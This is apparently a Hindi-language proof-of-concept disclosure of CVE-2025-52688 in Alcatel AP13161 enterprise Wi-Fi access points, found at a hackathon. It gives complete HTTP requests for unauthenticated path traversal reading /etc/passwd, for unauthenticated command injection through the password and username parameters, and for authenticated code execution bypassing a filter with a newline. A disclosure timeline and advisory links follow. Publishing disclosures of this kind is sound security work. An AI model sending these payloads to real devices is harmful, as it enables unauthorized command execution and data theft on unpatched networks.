
CVE-2025-52688 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण: Alcatel AP13161 एंटरप्राइज़ वाई-फाई एक्सेस पॉइंट्स में अप्रमाणित कमांड इंजेक्शन और मनमाना फ़ाइल पढ़ने की कमजोरियाँ, एक IoT/OT हैकाथॉन के दौरान खोजी गईं।
Alcatel AP13161 - एंटरप्राइज वाईफाई एक्सेस पॉइंट
यहां दो मुख्य कमजोरियों को संबोधित किया जा रहा है:
; जैसे दुर्भावनापूर्ण वर्णों को इंजेक्ट करने की अनुमति देती है, जिससे कमांड इंजेक्शन हमला होता हैfileName पैरामीटर पर उचित स्वच्छता और पहुँच नियंत्रण की कमी, जो सर्वर पर अनधिकृत मनमाना फ़ाइल पढ़ने की अनुमति देती हैयह कमजोरी CSA (सिंगापुर की साइबर सुरक्षा एजेंसी) और NTU द्वारा आयोजित SPIRICYBER-24 IoT/OT हैकाथॉन के दौरान खोजी गई थी
fileName पैरामीटर किसी भी अप्रमाणित उपयोगकर्ता को सिस्टम पर किसी भी फ़ाइल को देखने की अनुमति देता है। निर्देशिकाओं के माध्यम से पार करके, हम सर्वर पर संवेदनशील फ़ाइलों को पढ़ने में सक्षम हैं
POST /echo.fcgi HTTP/1.1
Host: XXXXX
User-Agent: Mozilla/5.0 (Linux; U; Android 7.0; en-us; MI 5 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.146 Mobile Safari/537.36 XiaoMi/MiuiBrowser/9.0.3
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 110
Connection: keep-alive
{
"id":1,
"jsonrpc":"2.0",
"username":"xxx",
"method":"downloader.cert",
"params":{
"fileName":"/../../etc/passwd"
}
}
/apiaccess एंडपॉइंट पर password पैरामीटर अप्रमाणित कमांड इंजेक्शन कमजोरी के लिए असुरक्षित है, जो किसी भी अप्रमाणित उपयोगकर्ताओं को सिस्टम कमांड निष्पादित करने की अनुमति देता है
POST /apiaccess HTTP/1.1
Host: XXXX
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
{
"id":1,
"jsonrpc":"2.0",
"method":"system.getPvc",
"params":{
"username": "Administrator",
"password":";echo pwned1234 > /tmp/test.txt"
}
}
echo.fcgi एंडपॉइंट पर username पैरामीटर अप्रमाणित कमांड इंजेक्शन कमजोरी के लिए असुरक्षित है, जो किसी भी अप्रमाणित उपयोगकर्ताओं को सिस्टम कमांड निष्पादित करने की अनुमति देता है
POST /echo.fcgi HTTP/1.1
Host:
Cache-Control: max-age=0
Accept-Language: en-GB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: application/json, text/plain, */*
{
"id":1,
"jsonrpc":"2.0",
"username":"Administrator",
"method":"user.logout",
"params":{
"username": ";echo pwned > /tmp/test.txt",
"Sessionid":""
}
}
command पैरामीटर प्रमाणित उपयोगकर्ताओं को लैंप पोस्ट की कार्यक्षमता का परीक्षण करने के लिए सिस्टम फ़ंक्शन और बाइनरी निष्पादित करने की अनुमति देता है। हालांकि, अपर्याप्त इनपुट फ़िल्टरिंग और ब्लैकलिस्ट के कारण, हम फ़िल्टर को बायपास करके एक प्रमाणित रिमोट कोड निष्पादन निष्पादित करने में सक्षम हैं, जो किसी भी लॉग इन उपयोगकर्ताओं को सिस्टम कमांड निष्पादित करने की अनुमति देता है
POST /echo.fcgi HTTP/1.1
Host: XXXX
Content-Length: 349
Accept: application/json, text/plain, */*
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
{
"id":1,
"jsonrpc":"2.0",
"method":"expressmessage.call",
"username":"Administrator",
"session":"XXXXXX",
"topic":"WMA/DC:XXXXXXX",
"params":{
"version":"3.0",
"messageID":1,
"macAddress":"DC:XXXXX",
"option":"update",
"method":"ap_manage.exce_command",
"contents":{
"command":"tech_support_command 9 127.0.0.1\nid"
}
}
}
2024-08-10: रिपोर्ट SpiritCyber IoT हैकाथॉन ट्राइएज टीम को प्रस्तुत की गई
2024-08-20: रिपोर्ट ट्राइएज टीम द्वारा स्वीकार की गई
2025-06-25: CSA SingCert ने CVE-2025-52688 आवंटित किया
2025-07-14: सार्वजनिक प्रकटीकरण
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-072
https://www.al-enterprise.com/-/media/567414972b57459697030898f92ac043.pdf